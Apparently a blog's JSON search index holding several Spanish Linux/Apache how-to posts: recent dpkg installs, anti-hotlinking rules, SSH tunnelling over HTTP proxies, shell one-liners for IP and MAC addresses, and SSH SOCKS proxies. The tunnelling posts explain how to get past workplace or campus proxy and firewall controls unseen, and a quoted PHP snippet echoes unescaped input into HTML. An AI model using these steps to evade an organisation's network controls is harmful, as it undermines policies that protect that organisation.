explotar dicha vulnerabilidad.\u003c/p\u003e","title":"Denegación de servicio en Apache utilizando la cabecera Range"},{"content":"En el fichero /var/log/dpkg.log se registran las operaciones sobre los paquetes que tenemos en el sistema: instalaciones, actualizaciones, eliminaciones, etc. Para obtener una lista de los últimos paquetes instalados ejecutamos:\n$ cat /var/log/dpkg.log* | grep \u0026#34; install \u0026#34; | sort ... 2011-08-24 12:11:04 install linux-image-2.6.38-11-generic-pae \u0026lt; ninguna\u0026gt; 2.6.38-11.48 2011-08-24 12:11:27 install linux-headers-2.6.38-11 \u0026lt; ninguna\u0026gt; 2.6.38-11.48 2011-08-24 12:11:33 install linux-headers-2.6.38-11-generic-pae \u0026lt; ninguna\u0026gt; 2.6.38-11.48 2011-08-26 18:25:40 install libcgal5 \u0026lt; ninguna\u0026gt; 3.6.1-2ubuntu2 2011-08-26 18:25:41 install libopencsg1 \u0026lt; ninguna\u0026gt; 1.3.1-4 2011-08-26 18:25:42 install openscad \u0026lt; ninguna\u0026gt; 2011.06-1+natty1 ","permalink":"http://karpoke.ignaciocano.com/2011/08/27/ultimos-paquetes-instalados/","summary":"\u003cp\u003eEn el fichero \u003ccode\u003e/var/log/dpkg.log\u003c/code\u003e se registran las operaciones sobre los\npaquetes que tenemos en el sistema: instalaciones, actualizaciones,\neliminaciones, etc. Para obtener una lista de los \u003ca href=\"http://distilledb.com/blog/archives/date/2009/06/30/getting-a-list-of-recently-installed-packages-in-ubuntu.page\"\u003eúltimos paquetes\ninstalados\u003c/a\u003e ejecutamos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ cat /var/log/dpkg.log* | grep \u0026#34; install \u0026#34; | sort\n...\n2011-08-24 12:11:04 install linux-image-2.6.38-11-generic-pae \u0026lt; ninguna\u0026gt; 2.6.38-11.48\n2011-08-24 12:11:27 install linux-headers-2.6.38-11 \u0026lt; ninguna\u0026gt; 2.6.38-11.48\n2011-08-24 12:11:33 install linux-headers-2.6.38-11-generic-pae \u0026lt; ninguna\u0026gt; 2.6.38-11.48\n2011-08-26 18:25:40 install libcgal5 \u0026lt; ninguna\u0026gt; 3.6.1-2ubuntu2\n2011-08-26 18:25:41 install libopencsg1 \u0026lt; ninguna\u0026gt; 1.3.1-4\n2011-08-26 18:25:42 install openscad \u0026lt; ninguna\u0026gt; 2011.06-1+natty1\n\u003c/code\u003e\u003c/pre\u003e","title":"Últimos paquetes instalados"},{"content":"Si tenemos una página web que contiene imágenes, tarde o temprano, alguien terminará mostrándolas en otro sitio, enlazándolas directamente y utilizando nuestro ancho de banda. Vamos, lo que se conoce como hotlinking.\nLa siguiente técnica se basa en el valor de la variable HTTP_REFERER, la cual es opcional, por lo que podría ser posible saltársela. Sin embargo, la mayoría de las veces impedirá el hotlinking. Como contrapartida, si alguien pone un enlace a una imagen, un usuario no podrá verla pulsando en el enlace, ya que el navegador incluirá como referer una URL externa y será bloqueada por el sistema.\nCon mod_rewrite Utilizando mod_rewrite tenemos varias opciones, desde denegar la petición hasta cambiar la imagen por otra. Las directivas RewriteCond y RewriteRule se pueden utilizar en el contexto de configuración del servidor, VirtualHost, Directory y .htaccess. Deberemos tener instalado el módulo mod_rewrite, tenerlo activado—mediante la directiva RewriteEngine On`—y reiniciar el servicio para que los cambios tengan efecto.\nDenegar las peticiones:\nRewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !www.example.com [NC] RewriteRule \\.(gif|jpe?g|png)$ - [F,NC] Mostrar una imagen alternativa:\nRewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !www.example.com [NC] RewriteRule \\.(gif|jpe?g|png)$ /images/go-away.png [R,NC] Redirigir la petición a una imagen de otro sitio:\nRewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !www.example.com [NC] RewriteRule \\.(gif|jpe?g|png)$ http://other.example.com/image.gif [R,NC] Si queremos prevenir el hotlinking de otro tipo de ficheros, como por ejemplo vídeos o ficheros de texto, tenemos que cambiar la directiva RewriteRule para incluirlos:\nRewriteRule \\.(gif|jpe?g|png|bmp|mov|avi|wmv|mpe?g)$ - [F] Si queremos que sí se pueda permitir un hotlinkg desde determinados sitios, sólo tenemos que añadirnos con la directiva RewriteCond:\nRewriteCond %{HTTP_REFERER} !friendlysite\\.com [NC] ... rest of RewriteCond’s RewriteCond %{HTTP_REFERER} !google\\. [NC] RewriteCond %{HTTP_REFERER} !search\\?q=cache [NC] Por último, podemos redirigir estas peticiones a través de un fichero. Esta redirección se hace de forma transparente, sin que se muestre la ruta real que incluye el fichero. Con esta técnica evitamos que, si ponen un enlace a una imagen, luego no se pueda ver si alguien pulsa.\nPara poder pasarle la imagen como parámetro al script, deberemos cambiar la forma en que identificamos las imágenes:\nRewriteCond %{REQUEST_FILENAME} .*jpe?g$|.*gif$|.*png$ [NC] RewriteRule (.*) /showpic.php?pic=$1 Este fichero muestra una pequeña página web que contiene, además de la imagen, un enlace a nuestro sitio:\n\u0026lt;?php // File: showpic.php // Author: A List Apart // Web: http://www.alistapart.com/articles/hotlinking/ header(\u0026#34;Content-type: text/html\u0026#34;); header(\u0026#34;Expires: Mon, 26 Jul 1997 05:00:00 GMT\u0026#34;); header(\u0026#34;Cache-Control: no-store, no-cache, must-revalidate\u0026#34;); header(\u0026#34;Cache-Control: post-check=0, pre-check=0\u0026#34;, false); header(\u0026#34;Pragma: no-cache\u0026#34;); $pic = strip_tags( $_GET[\u0026#39;pic\u0026#39;] ); if ( ! $pic ) { die(\u0026#34;No picture specified.\u0026#34;); } ?\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;title\u0026gt;\u0026lt;?php echo($pic); ?\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;meta http-equiv=\u0026#34;Content-Type\u0026#34; encoding=\u0026#34;charset=iso-8859-1\u0026#34;\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;img src=\u0026#34;/\u0026lt;?php echo($pic); ?\u0026gt;\u0026#34; alt=\u0026#34;Image\u0026#34;\u0026gt; Image from your web site. \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; Sin mod_rewrite Si, simplemente, queremos denegar la petición, no es necesario utilizar mod_rewrite:\nSetEnvIf Referer example\\.com localreferer Order deny,allow Deny from all Allow from env=localreferer Podemos probar si la solución funciona como queremos en el siguiente hotlink tester.`\n","permalink":"http://karpoke.ignaciocano.com/2011/08/16/evitando-el-hotlinking/","summary":"\u003cp\u003eSi tenemos una página web que contiene imágenes, tarde o temprano,\nalguien terminará mostrándolas en otro sitio, enlazándolas directamente\ny utilizando nuestro ancho de banda. Vamos, lo que se conoce como\n\u003cem\u003ehotlinking\u003c/em\u003e.\u003c/p\u003e\n\u003cp\u003eLa siguiente \u003ca href=\"http://httpd.apache.org/docs/2.3/rewrite/access.html\"\u003etécnica se basa en el valor de la variable\n\u003ccode\u003eHTTP_REFERER\u003c/code\u003e\u003c/a\u003e, la cual es opcional, por lo que podría ser posible\nsaltársela. Sin embargo, la mayoría de las veces impedirá el\n\u003cem\u003ehotlinking\u003c/em\u003e. Como contrapartida, si alguien pone un enlace a una\nimagen, un usuario no podrá verla pulsando en el enlace, ya que el\nnavegador incluirá como \u003cem\u003ereferer\u003c/em\u003e una URL externa y será bloqueada por\nel sistema.\u003c/p\u003e","title":"Evitando el hotlinking"},{"content":"A veces, queremos poder navegar o chatear por Internet pero no queremos que nadie pueda conocer, ni bloquear, las páginas que visitamos o espiar nuestras conversaciones, bien porque porque estamos en el trabajo, la universidad o en una red abierta. En la red a la que estamos conectados puede que utilicen un proxy para controlar y bloquear servicios. Este bloqueo podría ser por puerto o por protocolo.\nEs posible que bloqueen algunas URLs, o IPs, pero seguramente tenemos acceso a la web, es decir, los puertos 80 y 443. Crearemos un túnel seguro para poder navegar seguros y evitar estas restricciones. Eso sí, puede que aparezca en algún log que nos hemos conectado a nuestra máquina remota.\nProxy SOCKS Una manera de montar un túnel seguro es mediante un [proxy SOCKS][proxy SOCKS]. Aprovechamos el hecho de que el puerto 443 no está bloqueado.\nEn nuestro servidor remoto, podemos configurar openssh para que escuche en el puerto 443, añadiendo un Listen 443 al fichero /etc/ssh/sshd_config. Pero si ya tenemos un servidor web, por ejemplo apache2, que sirve conexiones seguras, podemos hacer uso de sslh, que permite que ambos servicios, SSL y SSH, compartan el puerto 443.\nEn nuestra máquina, lo primero que haremos será configurar ssh para que pueda pasar a través del proxy maligno que nos obligan a usar, mediante corkscrew -está en los repositorios-. Editamos el fichero ~/.ssh/config, y añadimos:\nProxyCommand /usr/local/bin/corkscrew proxy.evil.com 80 %h %p En lugar de corkscrew, podríamos utilizar proxytunnel:\nProxyCommand proxytunnel -v -p proxy.evil.com:80 -r remotehost:443 -d %h:%p -H \u0026#34;User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)\\n\u0026#34; Ahora ya podemos crear el proxy SOCKS desde nuestra máquina local:\n$ ssh -f -N -D 1080 user@remotehost Si no estamos obligados a utilizar un proxy, no hace falta que editemos el fichero ~/.ssh/config, y el proxy SOCKS se crea ejecutando el mismo comando que acabamos de lanzar.\nSólo queda configurar alguna aplicación, por ejemplo Firefox. Vamos al Menú Editar \u0026gt; Preferencias \u0026gt; Avanzado \u0026gt; Red \u0026gt; Configuración de la conexión \u0026gt; Configuración manual del proxy y ponemos:\nServidor SOCKS: localhost Puerto: 1080 Y listos.\nSSH over HTTP-Proxy Otra manera de hacerlo es a través de un proxy HTTP. En nuestra máquina remota, vamos a configurar Apache para que haga de proxy HTTP.\nActivamos el módulo:\n$ sudo a2enmod proxy_http Podemos realizar la configuración a nivel de módulo o de VirtualHost. Tener un proxy HTTP que redirija peticiones, mediante la directiva ProxyRequests, puede ser un peligro, dado que, mal configurado, podría permitir que cualquiera accediera a través de nosotros ocultando su identidad. Utilizar un proxy inverso, mediante la directiva ProxyPass y la directiva ProxyRequests Off, es menos crítico, porque los clientes sólo pueden conectar a los sitios que hemos configurado específicamente.\nLimitaremos el acceso para sólo permitirlo desde la propia máquina o desde una conexión SSH. Editamos el fichero /etc/apache2/mods-enabled/proxy.conf:\nListen 889 ProxyRequests On AllowCONNECT 22 ProxyVia On Order deny,allow Deny from all Allow from 127.0.0.1 Por un lado, el proxy no está escucha en el puerto por defecto, el 8080, sino que lo hace en el 889. Además, este puerto no está abierto ni el firewall ni en el router. El motivo de este cambio de puerto es que en la máquina remota tenía instalado Varnish, que es un acelerador web, que puede ser utilizado tanto para cachear contenido estático, como para balancear la carga o para incrementar la seguridad de nuestro servidor web. Sin embargo, en este caso, esto no supondrá ningún problema.\nPor otro, permitimos el método CONNECT al puerto 22, donde corre SSH, y permitimos el acceso únicamente desde la propia máquina. Una vez hechos los cambios, no olvidemos reiniciar el servidor web.\nAhora ya podemos crear el túnel desde nuestra máquina; redirigiremos el puerto remoto 889 a nuestro puerto local 8080, realizando la conexión por SSH en el puerto remoto 443:\n$ ssh -L 8080:localhost:889 user@server.at.home -p 443 Igual que en el caso anterior, si tenemos que utilizar de forma obligatoria el proxy maligno, editamos el fichero ~/.ssh/config:\nProxyCommand /usr/local/bin/corkscrew proxy.evil.com 80 %h %p Para configurar Firefox, vamos al Menú Editar \u0026gt; Preferencias \u0026gt; Avanzado \u0026gt; Red \u0026gt; Configuración de la conexión \u0026gt; Configuración manual del proxy y ponemos:\nHTTP Proxy: localhost (Usar este servidor proxy para todos los protocolos) Puerto: 8080 Si queremos configurar que se use el proxy desde el terminal, en aquellos programas que utilizan la variable de entorno HTTP_PROXY:\n$ export HTTP_PROXY=\u0026#39;http://localhost:8080/\u0026#39; Y para quitarlo:\n$ export HTTP_PROXY=\u0026#39;\u0026#39; Tanto desde Firefox como desde el terminal, podríamos haber puesto la IP, o el nombre, de un equipo remoto que tenga abierto un proxy HTTP.\nSin utilizar el método CONNECT Si no podemos utilizar el método CONNECT para conectarnos al puerto 443 de nuestra máquina remota, podemos probar a cambiar de puerto, por si hubiera alguno permitido.\nSi no encontramos ninguno, todavía podemos establecer un túnel utilizando HTTP mediante httptunnel -también está en los repositorios-. Consta de dos programas, un cliente y un servidor. En nuestra máquina remota, ejecutamos el servidor, redirigiendo el puerto 80 al 22. En este caso, si ya teníamos instalado Varnish, deberemos utilizar otro puerto, y abrirlo en el firewall.\n$ hts -F localhost:22 80 En nuestra máquina local ejecutaremos el cliente, que redirige el puerto local 8080 al puerto remoto 80, que a su vez es redirigido al puerto 22 remoto, utilizando el proxy maligno obligatorio de la red a la que nos conectamos:\n$ htc -P proxy.evil.com:80 -F 8080 remotehost:80 Referencias » SSH Through or Over Proxy » Accessing Trillian Pro Remotely and Through an Encrypted Tunnel » Using Corkscrew to tunnel SSH over HTTP » Tunneling SSH over HTTP(S) » Bypass Any Firewall » SSHThroughHTTPProxy » Tunneling SSH over an HTTP-Proxy Server » Apache Module mod_proxy\n","permalink":"http://karpoke.ignaciocano.com/2011/08/15/ssh-over-http-proxy/","summary":"\u003cp\u003eA veces, queremos poder navegar o chatear por Internet pero no queremos\nque nadie pueda conocer, ni bloquear, las páginas que visitamos o espiar\nnuestras conversaciones, bien porque porque estamos en el trabajo, la\nuniversidad o en una red abierta. En la red a la que estamos conectados\npuede que utilicen un \u003cem\u003eproxy\u003c/em\u003e para controlar y bloquear servicios. Este\n\u003ca href=\"http://ha.ckers.org/trillianremote.html\"\u003ebloqueo podría ser por puerto o por protocolo\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eEs posible que bloqueen algunas URLs, o IPs, pero seguramente tenemos\nacceso a la web, es decir, los puertos 80 y 443. Crearemos un túnel\nseguro para poder navegar seguros y evitar estas restricciones. Eso sí,\npuede que aparezca en algún \u003cem\u003elog\u003c/em\u003e que nos hemos conectado a nuestra\nmáquina remota.\u003c/p\u003e","title":"SSH over HTTP-Proxy"},{"content":"En los scripts que escribimos, a menudo, es necesario conocer la IP pública de nuestra red, o la IP privada y la dirección MAC de una interfaz de red. Con el comando ifconfig podemos conocer la información de las interfaces de red:\n$ ifconfig eth0 Link encap:Ethernet direcciónHW 00:11:22:33:44:55 Direc. inet:192.168.0.30 Difus.:192.168.0.255 Másc:255.255.255.0 Dirección inet6: fe80::203:dff:fe3c:f419/64 Alcance:Enlace ACTIVO DIFUSI–N FUNCIONANDO MULTICAST MTU:1500 Métrica:1 Paquetes RX:1627 errores:0 perdidos:0 overruns:0 frame:0 Paquetes TX:1067 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colaTX:1000 Bytes RX:560137 (560.1 KB) TX bytes:235094 (235.0 KB) Interrupción:19 Dirección base: 0xc800 eth1 Link encap:Ethernet direcciónHW 00:11:22:33:44:66 DIFUSI–N MULTICAST MTU:1500 Métrica:1 Paquetes RX:0 errores:0 perdidos:0 overruns:0 frame:0 Paquetes TX:0 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colaTX:1000 Bytes RX:0 (0.0 B) TX bytes:0 (0.0 B) Interrupción:21 Dirección base: 0x8000 Memoria:ffcfe000-ffcfefff lo Link encap:Bucle local Direc. inet:127.0.0.1 Másc:255.0.0.0 Dirección inet6: ::1/128 Alcance:Anfitrión ACTIVO BUCLE FUNCIONANDO MTU:16436 Métrica:1 Paquetes RX:3299 errores:0 perdidos:0 overruns:0 frame:0 Paquetes TX:3299 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colaTX:0 Bytes RX:355696 (355.6 KB) TX bytes:355696 (355.6 KB) Sin embargo, si queremos utilizar el dato en concreto—la IP privada o la dirección MAC—, necesitaremos trabajar un poco la salida que muestra ifconfig.\nIP privada Para obtener la IP privada (IPv4) de una interfaz concreta, por ejemplo, la eth0:\n$ ifconfig eth2 | perl -nle\u0026#39;/((\\d+\\.){3}\\d+)/ \u0026amp;\u0026amp; print $1\u0026#39; 192.168.0.30 La expresión regular es suficiente para parsear la salida de ifconfig y obtener la dirección IP de la interfaz. Pero esta expresión regular no la podríamos emplear para descartar una IP privada no válida.\nEl rango de IP privadas está definido en el RFC 1918 y contempla los rangos:\n10.0.0.0 - 10.255.255.255 (10/8 prefix) 172.16.0.0 - 172.31.255.255 (172.16/12 prefix) 192.168.0.0 - 192.168.255.255 (192.168/16 prefix) Actualizado el 29 de diciembre de 2014 Podemos utilizar el comando ipcalc para ver los rangos privados:\n$ ipcalc 10.0.0.0/8 Address: 10.0.0.0 00001010. 00000000.00000000.00000000 Netmask: 255.0.0.0 = 8 11111111. 00000000.00000000.00000000 Wildcard: 0.255.255.255 00000000. 11111111.11111111.11111111 =\u0026gt; Network: 10.0.0.0/8 00001010. 00000000.00000000.00000000 HostMin: 10.0.0.1 00001010. 00000000.00000000.00000001 HostMax: 10.255.255.254 00001010. 11111111.11111111.11111110 Broadcast: 10.255.255.255 00001010. 11111111.11111111.11111111 Hosts/Net: 16777214 Class A, Private Internet $ ipcalc 172.16.0.0/12 Address: 172.16.0.0 10101100.0001 0000.00000000.00000000 Netmask: 255.240.0.0 = 12 11111111.1111 0000.00000000.00000000 Wildcard: 0.15.255.255 00000000.0000 1111.11111111.11111111 =\u0026gt; Network: 172.16.0.0/12 10101100.0001 0000.00000000.00000000 HostMin: 172.16.0.1 10101100.0001 0000.00000000.00000001 HostMax: 172.31.255.254 10101100.0001 1111.11111111.11111110 Broadcast: 172.31.255.255 10101100.0001 1111.11111111.11111111 Hosts/Net: 1048574 Class B, Private Internet $ ipcalc 192.168.0.0/16 Address: 192.168.0.0 11000000.10101000. 00000000.00000000 Netmask: 255.255.0.0 = 16 11111111.11111111. 00000000.00000000 Wildcard: 0.0.255.255 00000000.00000000. 11111111.11111111 =\u0026gt; Network: 192.168.0.0/16 11000000.10101000. 00000000.00000000 HostMin: 192.168.0.1 11000000.10101000. 00000000.00000001 HostMax: 192.168.255.254 11000000.10101000. 11111111.11111110 Broadcast: 192.168.255.255 11000000.10101000. 11111111.11111111 Hosts/Net: 65534 Class C, Private Internet El siguiente script realiza la comprobación de una IP privada, y devuelve 1 si es válida, o 0 en caso contrario:\n#!/bin/bash IP=\u0026#34;$1\u0026#34; # checks for a valid number: 0..255 function v() { n=${1:-300} if [ $n -lt 0 ] || [ $n -gt 255 ]; then echo 0 else echo 1 fi } # parse IP OLD_IFS=$IFS IFS=\u0026#39;.\u0026#39; IP=($IP) IFS=$OLD_IFS A=${IP[0]} B=${IP[1]} C=${IP[2]} D=${IP[3]} # private ips. rfc 1918 https://tools.ietf.org/html/rfc1918#page-4 # 10.0.0.0 to 10.255.255.255 # 172.16.0.0 to 172.31.255.255 # 192.168.0.0 to 192.168.255.255 if [ $A -eq 10 -a $(v $B) -eq 1 -a $(v $C) -eq 1 -a $(v $D) -eq 1 ] || [ $A -eq 172 -a $B -ge 16 -a $B -le 31 -a $(v $C) -eq 1 -a $(v $D) -eq 1 ] || [ $A -eq 192 -a $B -eq 168 -a $(v $C) -eq 1 -a $(v $D) -eq 1 ]; then echo 1 else echo 0 fi Actualizado el 11 de enero de 2014 Otra forma de obtener la IP privada es mediante el comando hostname:\n$ hostname -I 192.168.0.30 Dirección MAC Para obtener la dirección MAC:\n$ ifconfig eth0 | grep -oE \u0026#39;([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}\u0026#39; 00:11:22:33:44:55 La dirección MAC está compuesta por 6 bytes, separados por dos puntos (:) o guión (-), por ejemplo, 00:11:22:33:44:55. La primera mitad (00:11:22) es el Identificador Único de Organización (OUI), el fabricante. La segunda mitad (33:44:55) es una extensión que permite identificar de forma única cada tarjeta de red para un fabricante concreto. Hay puntos de acceso que ignorarán OUIs inválidos. Está bien saber esto si vamos a cambiar la dirección MAC de una tarjeta. En este enlace se encuentra el listado de OUIs válidos.\nUna dirección MAC válida que tiene el último bit del primer byte a 0, se corresponde con una dirección unicast. Si es 1, indica una dirección de grupo, lo que se suele reservar para tráfico multicast. Las direcciones MAC con un origen multicast son invalidas y se ignoran.\nSi generamos la dirección MAC de forma aleatoria, deberíamos poner el primer byte a 0, para asegurarnos:\n$ echo $(cat /proc/interrupts | md5sum | sed -r \u0026#39;s/^(.{10}).*$/00\\1/; s/([0-9a-f]{2})/\\1:/g; s/:$//;\u0026#39;) 00:1f:7a:2e:ef:c7 Podemos comprobar si el OUI es válido ejecutando:\n$ mac=$(ifconfig eth0 | grep -oE \u0026#39;([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}\u0026#39;) $ oui=${mac:0:8} $ oui=${oui//:/-} $ test ! -r oui.txt \u0026amp;\u0026amp; wget http://standards.ieee.org/develop/regauth/oui/oui.txt # 2.3 MB $ grep -i $oui oui.txt \u0026amp;\u0026amp; echo \u0026#34;Valid OUI\u0026#34; || echo \u0026#34;Not valid OUI\u0026#34; IP Pública Si queremos obtener nuestra IP pública (IPv4), podemos recurrir a servicios como el de DynDNS:\n$ curl -s checkip.dyndns.org | grep -Eo \u0026#34;[0-9\\.]+\u0026#34; 1.2.3.4 Otros servicios:\ncheckip.dyndns.org fmbip.com icanhazip.com ifconfig.me ip.appspot.com ipecho.net/plain ipinfo.io ip.u3mx.com myip.dnsomatic.com myip.opendns.com snar.co/ip/ whatismyip.org www.check-my-ip.net www.ipchicken.com Actualización a 11 de enero de 2014 Si no queremos depender de terceros y tenemos acceso a algún servidor web, el siguiente código PHP nos devolverá nuestra IP:\n\u0026lt;?php echo $_SERVER[\u0026#39;REMOTE_ADDR\u0026#39;]; ?\u0026gt; Si en lugar de estar conectados en una LAN, estamos conectados directamente a Internet, en lugar de recurrir a servicios externos, podemos ejecutar:\n$ ifconfig | grep \u0026#39;inet addr:\u0026#39; | grep -v \u0026#39;127.0.0.1\u0026#39; | cut -d: -f2 | awk \u0026#39;{print $1}\u0026#39; 1.2.3.4 Actualizado el 24 de agosto de 2012 Direcciones .arpa Las direcciones .arpa se utilizan para la resolución inversa de DNS. Así por ejemplo, la IP 1.2.3.4 se asocia al dominio 4.3.2.1.in-addr.arpa.\nSi queremos obtener las IP asociadas a dominios .arpa para utilizarlas, por ejemplo, en un script, podemos usar el siguiente alias:\n$ alias arpa2ip=\u0026#39;(type farpa2ip \u0026gt;/dev/null 2\u0026gt;\u0026amp;1) || farpa2ip() { echo \u0026#34;$1\u0026#34; | awk \u0026#39;\\\u0026#39;\u0026#39;BEGIN{FS=\u0026#34;.\u0026#34;}{print $4\u0026#34;.\u0026#34;$3\u0026#34;.\u0026#34;$2\u0026#34;.\u0026#34;$1;}\u0026#39;\\\u0026#39;\u0026#39;; }; farpa2ip\u0026#39; Un ejemplo de uso:\n$ arpa2ip 12.108.52.65.in-addr.arpa 65.52.108.12 El proceso inverso, obtener una dirección .arpa a partir de una IP, se puede conseguir mediante el siguiente alias:\n$ alias ip2arpa=\u0026#39;(type fip2arpa \u0026gt;/dev/null 2\u0026gt;\u0026amp;1) || fip2arpa() { echo \u0026#34;$1\u0026#34; | awk \u0026#39;\\\u0026#39;\u0026#39;BEGIN{FS=\u0026#34;.\u0026#34;}{print $4\u0026#34;.\u0026#34;$3\u0026#34;.\u0026#34;$2\u0026#34;.\u0026#34;$1\u0026#34;.in-addr.arpa\u0026#34;;}\u0026#39;\\\u0026#39;\u0026#39;; }; fip2arpa\u0026#39; Un ejemplo de uso:\n$ ip2arpa 65.52.108.12 12.108.52.65.in-addr.arpa ","permalink":"http://karpoke.ignaciocano.com/2011/08/14/obteniendo-la-ip-publica-la-ip-privada-y-la-direccion-mac-en-bash/","summary":"\u003cp\u003eEn los \u003cem\u003escripts\u003c/em\u003e que escribimos, a menudo, es necesario conocer la IP pública\nde nuestra red, o la IP privada y la dirección MAC de una interfaz de red. Con\nel comando \u003ccode\u003eifconfig\u003c/code\u003e podemos conocer la información de las interfaces de red:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ ifconfig\neth0      Link encap:Ethernet  direcciónHW 00:11:22:33:44:55\n          Direc. inet:192.168.0.30  Difus.:192.168.0.255  Másc:255.255.255.0\n          Dirección inet6: fe80::203:dff:fe3c:f419/64 Alcance:Enlace\n          ACTIVO DIFUSI–N FUNCIONANDO MULTICAST  MTU:1500  Métrica:1\n          Paquetes RX:1627 errores:0 perdidos:0 overruns:0 frame:0\n          Paquetes TX:1067 errores:0 perdidos:0 overruns:0 carrier:0\n          colisiones:0 long.colaTX:1000\n          Bytes RX:560137 (560.1 KB)  TX bytes:235094 (235.0 KB)\n          Interrupción:19 Dirección base: 0xc800\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eeth1      Link encap:Ethernet  direcciónHW 00:11:22:33:44:66\n          DIFUSI–N MULTICAST  MTU:1500  Métrica:1\n          Paquetes RX:0 errores:0 perdidos:0 overruns:0 frame:0\n          Paquetes TX:0 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colaTX:1000\n          Bytes RX:0 (0.0 B)  TX bytes:0 (0.0 B)\n          Interrupción:21 Dirección base: 0x8000 Memoria:ffcfe000-ffcfefff\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003elo        Link encap:Bucle local\n          Direc. inet:127.0.0.1  Másc:255.0.0.0\n          Dirección inet6: ::1/128 Alcance:Anfitrión\n          ACTIVO BUCLE FUNCIONANDO  MTU:16436  Métrica:1\n          Paquetes RX:3299 errores:0 perdidos:0 overruns:0 frame:0\n          Paquetes TX:3299 errores:0 perdidos:0 overruns:0 carrier:0\n          colisiones:0 long.colaTX:0\n          Bytes RX:355696 (355.6 KB)  TX bytes:355696 (355.6 KB)\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eSin embargo, si queremos utilizar el dato en concreto—la IP privada o la\ndirección MAC—, necesitaremos trabajar un poco la salida que muestra\n\u003ccode\u003eifconfig\u003c/code\u003e.\u003c/p\u003e","title":"Obteniendo la IP pública, la IP privada y la dirección MAC en Bash"},{"content":"Un proxy SOCKS es un servidor que permite el acceso, normalmente, a través de un cortafuegos. Podemos utilizar SSH para crear un proxy SOCKSv5 en local, de tal manera que si configuramos una aplicación para que se conecte a través de este proxy, todo el tráfico vaya a través del canal seguro creado por SSH, y sea como si la conexión con dicha aplicación se hiciera en la máquina remota a la cual nos hemos conectado por SSH. Además, podemos utilizarlo con varias aplicaciones y diferentes protocolos.\nEsto nos permitirá, por ejemplo, navegar por cualquier sitio sin las restricciones que pudiera tener la red a la cual nos hemos conectado, y sin que nadie de dicha red pueda conocer qué páginas visitamos. No se limita únicamente a navegar, también lo podemos utilizar para consultar el correo electrónico, mensajería instantánea, etc. Se puede aplicar a cualquier aplicación que pueda utilizar un proxy SOCKS. De hecho, incluso con aplicaciones que no están pensadas para utilizar este tipo de proxies.\nCrear el proxy SOCKS Para crear el proxy SOCKS, ejecutamos:\n$ ssh -f -N -D 1080 user@remotehost Con el argumento -f ejecutamos SSH en segundo plano. Con el argumento -N le decimos que no vamos a ejecutar ningún comando, por lo que no nos dará acceso a la consola. El argumento -D es el que crea una redirección de puertos local a nivel de aplicación. Crea un socket que escucha en el puerto especificado, en este caso el 1080, en nuestra máquina y cuando se realiza una conexión a este puerto, la conexión se redirecciona a través del canal seguro creado.\nEstán soportadas las versiones SOCKS4 y SOCKS5. La principal diferencia entre las dos es que la versión 5 incorporando autenticación. Sólo el root puede redirigir puertos bien conocidos.\nConfigurar las aplicaciones Una vez creado el proxy SOCKS, deberemos configurar la aplicación para que haga uso de él. Por ejemplo, para Firefox debemos ir a Editar \u0026gt; Preferencias \u0026gt; Avanzado \u0026gt; Red \u0026gt; Configuración de la conexión \u0026gt; Configuración manual del proxy y ponemos:\nServidor SOCKS: localhost Puerto: 1080 tsocks, para las aplicaciones que no soportan el uso de proxies Hay aplicaciones que no están pensadas para utilizar un proxy SOCKS. En este caso, utilizaremos el comando tsocks, que permite que cualquier aplicación utilice este tipo de proxies de forma transparente. Después de instalarlo de los repositorios, debemos configurarlo editando el fichero /etc/tsocks.conf:\nserver = 127.0.0.1 server_type = 5 server_port = 1080 Para conseguir que una aplicación utilice nuestro proxy SOCKS:\n$ tsocks telnet google.com 80 Trying 209.85.148.106... Connected to google.com. Escape character is \u0026#39;^]\u0026#39;. ^C tsocks se basa en el concepto de \u0026ldquo;shared library interceptor\u0026rdquo;. Mediante el uso de la variable de entorno LD_PRELOAD, o del archivo /etc/ld.so.preload, tsocks se carga automáticamente en el espacio del proceso de cada programa ejecutado y sobrescribe la función connect(), de tal manera que cuando una aplicación quiere establecer una conexión TCP, en su lugar, pasa el control a tsocks, quien determina si la conexión tiene que realizarse a través de un servidor SOCKS (comprobando /etc/tsocks.conf) y, si es así, negocia la conexión utilizando la función connect() real.\nSi ejecutamos tsocks sin pasarle ningún parámetro, crea una consola en la que tsocks están incluido en la variable LD_PRELOAD.\nTambién podemos incluir tsocks en la variable de entorno LD_PRELOAD de la sesión actual, eliminarlo o comprobar si ya está incluido:\n$ tsocks -on $ tsocks -off $ tsocks -show Por lo visto, las aplicaciones Java no se entienden con tsocks y requieren una configuración especial:\n$ java -DsocksProxyHost=127.0.0.1 -DsocksProxyPort=1080 MiAplicacionJava autossh, cuando el proxy se cae Podría pasar que la conexión se corte de vez en cuando. En este caso, podemos utilizar autossh:\n$ autossh -f -N -D 1080 user@remotehost SSH a través del proxy SOCKS Para conectarnos a un servidor SSH a través de otro, no es necesario que creemos un proxy SOCKS. Podemos conectarnos utilizando uno de intermediario:\n$ ssh -t remotehost ssh otherremotehost Esto se suele utilizar si, desde donde estamos, remotehost es accesible pero otherremotehost no lo es, pero éste sí es accesible desde el primero. Sin embargo, esta opción no va del todo bien si lo que queremos es utilizar scp o sftp.\nPodríamos utilizar tsocks para crear una conexión SSH a través del proxy SOCKS que 